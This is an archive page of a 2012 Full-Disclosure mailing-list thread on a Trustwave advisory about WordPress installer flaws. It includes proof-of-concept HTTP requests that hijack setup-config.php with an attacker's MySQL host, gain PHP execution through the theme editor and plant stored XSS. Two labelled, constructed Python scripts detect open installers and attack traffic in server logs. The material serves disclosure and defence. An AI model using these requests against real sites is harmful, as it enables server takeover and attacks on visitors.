Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

2012-01-26 Thread Henri Salo
On Wed, Jan 25, 2012 at 04:13:12PM +, Benji wrote:
 Yes it does.
 
 wp-admin/setup-config.php?step=1 on any wp install where it exists gives
 this:
 
 The file 'wp-config.php' already exists one level above your WordPress
 installation. If you need to reset any of the configuration items in this
 file, please delete it first.

Yes this is correct information at least with new versions of WordPress. We are 
running a pretty big Linux server in our organization and I can tell you that 
open "install me" pages are very common and I see these as a problem.

I can try to find out what went wrong with the installation or did they remove 
the WordPress-installation and didn't understand to remove everything included. 
I really hope to see this patched anyways just to be sure. I don't know what 
the actual impact in user-experience can be. Could WordPress comment?

- Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
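
Added example (not part of any message in this thread, and not WordPress or Trustwave code): a server-side audit for the situation discussed above, WordPress copies that still ship wp-admin/setup-config.php but have no wp-config.php. The function names and the sample directory layout are constructed, and the rule that a config one level above only counts when that parent has no wp-settings.php is an assumption about the installer's guard.

```python
import os
import tempfile

INSTALLER = os.path.join("wp-admin", "setup-config.php")


def is_configured(wp_root):
    """Model the installer's guard: a wp-config.php in the install directory,
    or one level above it when the parent is not itself a WordPress copy.
    The wp-settings.php condition is an assumption, not taken from the thread."""
    if os.path.isfile(os.path.join(wp_root, "wp-config.php")):
        return True
    parent = os.path.dirname(os.path.abspath(wp_root))
    return (os.path.isfile(os.path.join(parent, "wp-config.php"))
            and not os.path.isfile(os.path.join(parent, "wp-settings.php")))


def find_open_installers(web_root):
    """Return, relative to web_root, every directory that contains
    wp-admin/setup-config.php but is not configured."""
    findings = []
    for dirpath, _dirnames, _filenames in os.walk(web_root):
        if os.path.isfile(os.path.join(dirpath, INSTALLER)):
            if not is_configured(dirpath):
                findings.append(os.path.relpath(dirpath, web_root))
    return sorted(findings)


def build_demo_tree(base):
    """Create a constructed sample layout (not from any real server)."""
    files = [
        # configured install
        "customer1/wp-admin/setup-config.php",
        "customer1/wp-config.php",
        # unpacked from a default image, never set up
        "customer2/wp-admin/setup-config.php",
        # config kept one level above the document root
        "customer3/wp-config.php",
        "customer3/public/wp-admin/setup-config.php",
        # configured install with a forgotten second copy inside it
        "customer4/wp-admin/setup-config.php",
        "customer4/wp-config.php",
        "customer4/wp-settings.php",
        "customer4/old/wp-admin/setup-config.php",
    ]
    for rel in files:
        path = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        open(path, "w").close()


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as base:
        build_demo_tree(base)
        for hit in find_open_installers(base):
            print("installer reachable, no wp-config.php:", hit)
```

Directories it reports are candidates for removal or for blocking access to the installer at the web server.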


Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

2012-01-25 Thread Trustwave Advisories
The vendor was notified. They have chosen not to fix the issue at this time. 
The Vendor Response section has the details:

Vendor Response:
Due to the fact that the component in question is an installation script,
the vendor has stated that the attack surface is too small to warrant
a fix:

We give priority to a better user experience at the install process. It is
unlikely a user would go to the trouble of installing a copy of WordPress
and then not finishing the setup process more-or-less immediately. The
window of opportunity for exploiting such a vulnerability is very small.

However, Trustwave SpiderLabs urges caution in situations where the
WordPress installation script is provided as part of a default image.
This is  often done as a convenience on hosting providers, even in
cases where the client does not use the software. It is a best practice
to ensure  that no installation scripts are exposed to outsiders, and
these vulnerabilities reinforce the importance of this step.

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Henri Salo
Sent: Tuesday, January 24, 2012 5:48 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in 
WordPress

On Tue, Jan 24, 2012 at 04:09:16PM -0600, Trustwave Advisories wrote:
 Trustwave's SpiderLabs Security Advisory TWSL2012-002:
 Multiple Vulnerabilities in WordPress

 https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt

 Published: 1/24/12
 Version: 1.0

 Vendor: WordPress (http://wordpress.org/)
 Product: WordPress
 Version affected: 3.3.1 and prior

 Product description:
 WordPress is a free and open source blogging tool and publishing
 platform powered by PHP and MySQL.

 Credit: Jonathan Claudius of Trustwave SpiderLabs

 Finding 1: PHP Code Execution and Persistent Cross Site Scripting
 Vulnerabilities via 'setup-config.php' page.
 CVE: CVE-2011-4899

 The WordPress 'setup-config.php' installation page allows users to
 install WordPress in local or remote MySQL databases. This typically
 requires a user to have valid MySQL credentials to complete.  However,
 a malicious user can host their own MySQL database server and can
 successfully complete the WordPress installation without having valid 
 credentials on the target system.

 After the successful installation of WordPress, a malicious user can
 inject malicious PHP code via the WordPress Themes editor.  In
 addition, with control of the database store, malicious Javascript can
 be injected into the content of WordPress yielding persistent Cross Site 
 Scripting.

 Proof of Concept:

 Servers Involved

 A.B.C.D = Target WordPress Web Server
 W.X.Y.Z = Malicious User's MySQL Instance

 1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port
 3306

 2.) Performs POST/GET Requests to Install WordPress into MySQL
 Instance

 Request #1
 --
 POST /wp-admin/setup-config.php?step=2 HTTP/1.1
 Host: A.B.C.D
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
 Gecko/20100101 Firefox/8.0.1
 Accept:
 text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-us,en;q=0.5
 Accept-Encoding: gzip, deflate
 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
 Proxy-Connection: keep-alive
 Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
 Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 81

 dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z&prefix=wp_&submit=Submit

 Request #2
 --
 GET /wp-admin/install.php HTTP/1.1
 Host: A.B.C.D
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
 Gecko/20100101 Firefox/8.0.1
 Accept:
 text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-us,en;q=0.5
 Accept-Encoding: gzip, deflate
 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
 Proxy-Connection: keep-alive
 Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2
 Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
 If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT

 3.) Get PHP Code Execution

 Malicious user edits 404.php via Themes Editor as follows:

 <?php
 phpinfo();
 ?>

 Note #1: Any php file in the theme could be used.
 Note #2: Depending settings, PHP may be used to execute system commands
  on webserver.

 Malicious user performs get request of modified page to execute code.

 Request
 ---
 GET /wp-content/themes/default/404.php HTTP/1.1
 Host: A.B.C.D
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
 Gecko/20100101 Firefox/8.0.1

 4.) Get Persistent Cross Site Scripting

 Malicious User Injects Malicious Javascript into their own MySQL
 database instance

 MySQL Query
 ---
 update wp_comments SET
 comment_content='<script>alert('123')</script>' where
 comment_content='Hi, this is a comment.<br />To delete \ a comment,
 just log

Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

2012-01-25 Thread Henri Salo
On Wed, Jan 25, 2012 at 08:43:34AM -0600, Trustwave Advisories wrote:
 The vendor was notified. They have chosen not to fix the issue at this time. 
 The Vendor Response section has the details:
 
 Vendor Response:
 Due to the fact that the component in question is an installation script,
 the vendor has stated that the attack surface is too small to warrant
 a fix:
 
 We give priority to a better user experience at the install process. It is
 unlikely a user would go to the trouble of installing a copy of WordPress
 and then not finishing the setup process more-or-less immediately. The
 window of opportunity for exploiting such a vulnerability is very small.
 
 However, Trustwave SpiderLabs urges caution in situations where the
 WordPress installation script is provided as part of a default image.
 This is  often done as a convenience on hosting providers, even in
 cases where the client does not use the software. It is a best practice
 to ensure  that no installation scripts are exposed to outsiders, and
 these vulnerabilities reinforce the importance of this step.

There are A LOT of these open installation pages on the Internet. It is not 
uncommon to leave those open by accident. Some people also do this, because 
they just don't understand the risks. I am wondering if WordPress would apply 
a patch if we create one as a collaborative effort. I would be more than happy 
to help create a patch for this if this is the case.

- Henri Salo



Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

2012-01-25 Thread Tim Brown
On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote:

 There is A LOT of these open installation pages in the Internet. It is not
 uncommon to leave those open by accident. Some people also do this,
 because they just don't understand the risks. I am wondering if WordPress
 would apply patch if we create one as a collaborative effort. I would be
 more than happy to help creating a patch for this if this is the case.

I may have missed something, but does simply having the file exposed make you 
vulnerable?  From looking at it, it starts off with a bunch of file_exists(), 
which essentially evaluate if you've installed or not and wp_die() if you 
have.

Tim
-- 
Tim Brown
mailto:t...@65535.com



Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

2012-01-25 Thread Benji
Dear full-disclosure

I wrote to you to tell you about serious serious vulnerability in all
Windows versions.

If you turn machine on before system is configured, then you be able to set
user password yourself, big gaping hole

I make big large botnet to fully utilise this impressive vulnerability!
thegrugq said i could sell this for liike 3 ferrari's and 1 russian wife, i
say nay though! Big time russian mobster offer me diamond, i say nay! I
like report vuln of this size responsibility in so hope to make more
money^H^H^H^H^H^H^Hsecure world.

Please full-disclosure, this vuln is serious and i plead you shut down all
windows now.

I wrote metasploit module! It find new installs turned off machine, WOL and
i go to house and enter password! FULL SYSTEM OWNED! Big botnets! Many
wifes!




On Wed, Jan 25, 2012 at 2:49 PM, Tim Brown t...@65535.com wrote:

 On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote:

  There is A LOT of these open installation pages in the Internet. It is
 not
  uncommon to leave those open by accident. Some people also do this,
  because they just don't understand the risks. I am wondering if WordPress
  would apply patch if we create one as a collaborative effort. I would be
  more than happy to help creating a patch for this if this is the case.

 I may have missed something, but does simply having the file exposed make
 you
 vulnerable.  From looking at it, it starts of with a bunch of
 file_exists(),
 which essentially evaluate if you've installed or not and wp_die() if you
 have.

 Tim
 --
 Tim Brown
 mailto:t...@65535.com


Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

2012-01-25 Thread Benji
Yes it does.

wp-admin/setup-config.php?step=1 on any wp install where it exists gives
this:

The file 'wp-config.php' already exists one level above your WordPress
installation. If you need to reset any of the configuration items in this
file, please delete it first.


On Wed, Jan 25, 2012 at 4:11 PM, Julius Kivimäki
julius.kivim...@gmail.com wrote:

 Funny but no, this does not need a non-installed wordpress.


 2012/1/25 Benji m...@b3nji.com

 Dear full-disclosure

 I wrote to you to tell you about serious serious vulnerability in all
 Windows versions.

 If you turn machine on before system is configured, then you be able to
 set user password yourself, big gaping hole

 I make big large botnet to fully utilise this impressive vulnerability!
 thegrugq said i could sell this for liike 3 ferrari's and 1 russian wife, i
 say nay though! Big time russian mobster offer me diamond, i say nay! I
 like report vuln of this size responsibility in so hope to make more
 money^H^H^H^H^H^H^Hsecure world.

 Please full-disclosure, this vuln is serious and i plead you shut down
 all windows now.

 I wrote metasploit module! It find new installs turned off machine, WOL
 and i go to house and enter password! FULL SYSTEM OWNED! Big botnets! Many
 wifes!




 On Wed, Jan 25, 2012 at 2:49 PM, Tim Brown t...@65535.com wrote:

 On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote:

  There is A LOT of these open installation pages in the Internet. It is
 not
  uncommon to leave those open by accident. Some people also do this,
  because they just don't understand the risks. I am wondering if
 WordPress
  would apply patch if we create one as a collaborative effort. I would
 be
  more than happy to help creating a patch for this if this is the case.

 I may have missed something, but does simply having the file exposed
 make you
 vulnerable.  From looking at it, it starts of with a bunch of
 file_exists(),
 which essentially evaluate if you've installed or not and wp_die() if you
 have.

 Tim
 --
 Tim Brown
 mailto:t...@65535.com


Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

2012-01-25 Thread Julius Kivimäki
Funny but no, this does not need a non-installed wordpress.

2012/1/25 Benji m...@b3nji.com

 Dear full-disclosure

 I wrote to you to tell you about serious serious vulnerability in all
 Windows versions.

 If you turn machine on before system is configured, then you be able to
 set user password yourself, big gaping hole

 I make big large botnet to fully utilise this impressive vulnerability!
 thegrugq said i could sell this for liike 3 ferrari's and 1 russian wife, i
 say nay though! Big time russian mobster offer me diamond, i say nay! I
 like report vuln of this size responsibility in so hope to make more
 money^H^H^H^H^H^H^Hsecure world.

 Please full-disclosure, this vuln is serious and i plead you shut down all
 windows now.

 I wrote metasploit module! It find new installs turned off machine, WOL
 and i go to house and enter password! FULL SYSTEM OWNED! Big botnets! Many
 wifes!




 On Wed, Jan 25, 2012 at 2:49 PM, Tim Brown t...@65535.com wrote:

 On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote:

  There is A LOT of these open installation pages in the Internet. It is
 not
  uncommon to leave those open by accident. Some people also do this,
  because they just don't understand the risks. I am wondering if
 WordPress
  would apply patch if we create one as a collaborative effort. I would be
  more than happy to help creating a patch for this if this is the case.

 I may have missed something, but does simply having the file exposed make
 you
 vulnerable.  From looking at it, it starts of with a bunch of
 file_exists(),
 which essentially evaluate if you've installed or not and wp_die() if you
 have.

 Tim
 --
 Tim Brown
 mailto:t...@65535.com


[Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

2012-01-24 Thread Trustwave Advisories
Trustwave's SpiderLabs Security Advisory TWSL2012-002:
Multiple Vulnerabilities in WordPress

https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt

Published: 1/24/12
Version: 1.0

Vendor: WordPress (http://wordpress.org/)
Product: WordPress
Version affected: 3.3.1 and prior

Product description:
WordPress is a free and open source blogging tool and publishing platform
powered by PHP and MySQL.

Credit: Jonathan Claudius of Trustwave SpiderLabs

Finding 1: PHP Code Execution and Persistent Cross Site Scripting
Vulnerabilities via 'setup-config.php' page.
CVE: CVE-2011-4899

The WordPress 'setup-config.php' installation page allows users to install
WordPress in local or remote MySQL databases. This typically requires a user
to have valid MySQL credentials to complete.  However, a malicious user can
host their own MySQL database server and can successfully complete the
WordPress installation without having valid credentials on the target system.

After the successful installation of WordPress, a malicious user can inject
malicious PHP code via the WordPress Themes editor.  In addition, with control
of the database store, malicious Javascript can be injected into the content
of WordPress yielding persistent Cross Site Scripting.

Proof of Concept:

Servers Involved

A.B.C.D = Target WordPress Web Server
W.X.Y.Z = Malicious User's MySQL Instance

1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port 3306

2.) Performs POST/GET Requests to Install WordPress into MySQL Instance

Request #1
--
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
Content-Type: application/x-www-form-urlencoded
Content-Length: 81

dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z&prefix=wp_&submit=Submit

Request #2
--
GET /wp-admin/install.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT

3.) Get PHP Code Execution

Malicious user edits 404.php via Themes Editor as follows:

<?php
phpinfo();
?>

Note #1: Any php file in the theme could be used.
Note #2: Depending settings, PHP may be used to execute system commands
 on webserver.

Malicious user performs get request of modified page to execute code.

Request
---
GET /wp-content/themes/default/404.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
Gecko/20100101 Firefox/8.0.1

4.) Get Persistent Cross Site Scripting

Malicious User Injects Malicious Javascript into their own MySQL database 
instance

MySQL Query
---
update wp_comments SET
comment_content='<script>alert('123')</script>' where comment_content='Hi,
this is a comment.<br />To delete \ a comment, just log in and view the
post&#039;s comments. There you will have the option to edit or delete
them.';

Non-malicious User Visits Wordpress installation and has Javascript executed on 
their browser

Request
---
GET /?p=1 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
Gecko/20100101 Firefox/8.0.1



Finding 2: Multiple Cross Site Scripting Vulnerabilities in
'setup-config.php' page
CVE: CVE-2012-0782

The WordPress 'setup-config.php' installation page allows users to install
WordPress in local or remote MySQL databases. When using this installation page
the user is asked to supply the database name, the server that the database
resides on, and a valid MySQL username and password.

During this process, malicious users can supply javascript within
the dbname, dbhost or uname parameters. Upon clicking the submission
button, the javascript is rendered in the client's browser.

Proof of Concept:

Servers Involved

A.B.C.D = Target WordPress Web Server

Request
---
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Content-Type: 
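
Added example (not part of the advisory or of any message in this thread): detection logic for the request sequence in the Finding 1 proof of concept, run over a web server access log. The Apache combined log format, the trusted admin network, the stage names and the sample log lines are all assumptions constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Assumed log format: Apache/nginx "combined".
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Assumption: installs are only ever performed from this admin network.
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8")]

# Ordered from least to most serious.
STAGES = ["probe", "setup-submitted", "install-reached"]

# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE_LOG = """\
10.1.2.3 - - [25/Jan/2012:10:00:01 +0000] "POST /wp-admin/setup-config.php?step=2 HTTP/1.1" 200 1523 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Jan/2012:10:05:11 +0000] "GET /wp-admin/setup-config.php?step=1 HTTP/1.1" 200 2841 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Jan/2012:10:05:40 +0000] "POST /wp-admin/setup-config.php?step=2 HTTP/1.1" 200 1523 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Jan/2012:10:05:44 +0000] "GET /wp-admin/install.php HTTP/1.1" 200 3310 "-" "Mozilla/5.0"
203.0.113.9 - - [25/Jan/2012:11:20:02 +0000] "GET /wp-admin/setup-config.php?step=1 HTTP/1.1" 500 512 "-" "Mozilla/5.0"
203.0.113.9 - - [25/Jan/2012:11:20:09 +0000] "GET /wp-admin/install.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def is_trusted(client):
    """True when the client address lies inside a trusted admin network."""
    try:
        addr = ipaddress.ip_address(client)
    except ValueError:
        return False  # hostnames in the log are treated as untrusted
    return any(addr in net for net in TRUSTED_NETS)


def classify(lines):
    """Map each untrusted client to the furthest installer stage it reached."""
    stage = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m or is_trusted(m["client"]):
            continue
        client, url = m["client"], urlsplit(m["target"])
        ok = m["status"].startswith("2")
        current = stage.get(client)
        if url.path.endswith("/wp-admin/setup-config.php"):
            step = parse_qs(url.query).get("step", [""])[0]
            submitted = m["method"] == "POST" and step == "2" and ok
            new = "setup-submitted" if submitted else "probe"
        elif (url.path.endswith("/wp-admin/install.php") and ok
              and current == "setup-submitted"):
            new = "install-reached"
        else:
            continue
        if current is None or STAGES.index(new) > STAGES.index(current):
            stage[client] = new
    return stage


if __name__ == "__main__":
    for client, reached in sorted(classify(SAMPLE_LOG.splitlines()).items()):
        print(client, reached)
```

A "setup-submitted" or "install-reached" result from an address outside the admin network is the case the advisory describes and warrants checking which database host ended up in wp-config.php.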

Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

2012-01-24 Thread Henri Salo
On Tue, Jan 24, 2012 at 04:09:16PM -0600, Trustwave Advisories wrote:
 Trustwave's SpiderLabs Security Advisory TWSL2012-002:
 Multiple Vulnerabilities in WordPress
 
 https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt
 
 Published: 1/24/12
 Version: 1.0
 
 Vendor: WordPress (http://wordpress.org/)
 Product: WordPress
 Version affected: 3.3.1 and prior
 
 Product description:
 WordPress is a free and open source blogging tool and publishing platform
 powered by PHP and MySQL.
 
 Credit: Jonathan Claudius of Trustwave SpiderLabs
 
 Finding 1: PHP Code Execution and Persistent Cross Site Scripting
 Vulnerabilities via 'setup-config.php' page.
 CVE: CVE-2011-4899
 
 The WordPress 'setup-config.php' installation page allows users to install
 WordPress in local or remote MySQL databases. This typically requires a user
 to have valid MySQL credentials to complete.  However, a malicious user can
 host their own MySQL database server and can successfully complete the
 WordPress installation without having valid credentials on the target system.
 
 After the successful installation of WordPress, a malicious user can inject
 malicious PHP code via the WordPress Themes editor.  In addition, with control
 of the database store, malicious Javascript can be injected into the content
 of WordPress yielding persistent Cross Site Scripting.
 
 Proof of Concept:
 
 Servers Involved
 
 A.B.C.D = Target WordPress Web Server
 W.X.Y.Z = Malicious User's MySQL Instance
 
 1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port 3306
 
 2.) Performs POST/GET Requests to Install WordPress into MySQL Instance
 
 Request #1
 --
 POST /wp-admin/setup-config.php?step=2 HTTP/1.1
 Host: A.B.C.D
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
 Gecko/20100101 Firefox/8.0.1
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-us,en;q=0.5
 Accept-Encoding: gzip, deflate
 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
 Proxy-Connection: keep-alive
 Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
 Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 81
 
 dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z&prefix=wp_&submit=Submit
 
 Request #2
 --
 GET /wp-admin/install.php HTTP/1.1
 Host: A.B.C.D
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
 Gecko/20100101 Firefox/8.0.1
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-us,en;q=0.5
 Accept-Encoding: gzip, deflate
 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
 Proxy-Connection: keep-alive
 Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2
 Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
 If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT
 
 3.) Get PHP Code Execution
 
 Malicious user edits 404.php via Themes Editor as follows:
 
 <?php
 phpinfo();
 ?>
 
 Note #1: Any php file in the theme could be used.
 Note #2: Depending settings, PHP may be used to execute system commands
  on webserver.
 
 Malicious user performs get request of modified page to execute code.
 
 Request
 ---
 GET /wp-content/themes/default/404.php HTTP/1.1
 Host: A.B.C.D
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
 Gecko/20100101 Firefox/8.0.1
 
 4.) Get Persistent Cross Site Scripting
 
 Malicious User Injects Malicious Javascript into their own MySQL database 
 instance
 
 MySQL Query
 ---
 update wp_comments SET
 comment_content='<script>alert('123')</script>' where comment_content='Hi,
 this is a comment.<br />To delete \ a comment, just log in and view the
 post&#039;s comments. There you will have the option to edit or delete
 them.';
 
 Non-malicious User Visits Wordpress installation and has Javascript executed 
 on their browser
 
 Request
 ---
 GET /?p=1 HTTP/1.1
 Host: A.B.C.D
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
 Gecko/20100101 Firefox/8.0.1
 
 
 
 Finding 2: Multiple Cross Site Scripting Vulnerabilities in
 'setup-config.php' page
 CVE: CVE-2012-0782
 
 The WordPress 'setup-config.php' installation page allows users to install
 WordPress in local or remote MySQL databases. When using this installation 
 page
 the user is asked to supply the database name, the server that the database
 resides on, and a valid MySQL username and password.
 
 During this process, malicious users can supply javascript within
 the dbname, dbhost or uname parameters. Upon clicking the submission
 button, the javascript is rendered in the client's browser.
 
 Proof of Concept:
 
 Servers Involved
 
 A.B.C.D = Target WordPress Web Server
 
 Request
 ---
 POST /wp-admin/setup-config.php?step=2 HTTP/1.1
 Host: A.B.C.D
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
 Gecko/20100101 Firefox/8.0.1
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8